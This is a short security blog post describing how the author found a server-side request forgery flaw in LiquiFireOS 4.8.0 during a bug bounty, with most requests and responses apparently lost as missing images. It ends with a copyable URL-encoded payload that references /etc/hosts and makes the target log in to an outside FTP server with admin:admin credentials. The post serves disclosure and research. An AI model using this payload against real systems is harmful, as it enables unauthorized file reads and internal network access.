sobota, 28 grudnia 2019

Testing SSRF in LiquiFireOS

During one bugbounty I found that the target webapp is presenting some 'interesting errors' in responses. ;) As this is always a nice and cool 'hint' to see during pentests/ctfs I decided to dig a little bit more. Below you will find the details for SSRF found in LiquiFireOS. Here we go...

Today we'll start here:


This solutions was 'something new' for me. Example response I found online during bugbounty:
 
 
I decided to use Burp Suite and try few of the scenarios described in one of the posts available on the blog:


Few more cases (and sample response):



So it looks like we're talking about version 4.8.0 :) Cool, next:

As you can see (example requests from Intruder) there is a nice part of the link, for example url.
I decided to check some other 'url' :) Results below:


That looks interesting ;> So what is the problem? Maybe the port? Maybe the hostname? I will try to change both of them:



That's nice :) Is there any other parameter available for this kind of modification?


To verify it I decided to read a very nice book for Christmas - called the manual: ;)


You can find few more cool cases and examples there.

As I saw in one of the error messages, there are only 4 possibilities to use: http://, ftp://, file:// and cms://. I decided to use http and ftp:

Nice response. ;)

I decided to check if the target app will be able to do something else for me. For example to log in to some (internal?;)) ftp server. Because I do not have one (in the 'target/bugbounty company' ;)) I decided to use some nice-for-cats-ftp server I found online. Let's try to log in with admin:admin credentials:


Looks promising ;)

If you will see the main page ('of the target') there should be something like this:


Sample payload to use in your URL:
"%3Fset%3Dsource[/etc/hosts]%2Corigin[/etc/]%2Ccategory[2]%2Ctype[DESCRIPTIVESTILLLIFE]%2Chmver[3]%26call%3Durl[ftp:%2f%2fadmin:admin@xxxxxxxxx.pl/]"

Maybe you'll find it useful.

See you next time!

Cheers




Brak komentarzy:

Prześlij komentarz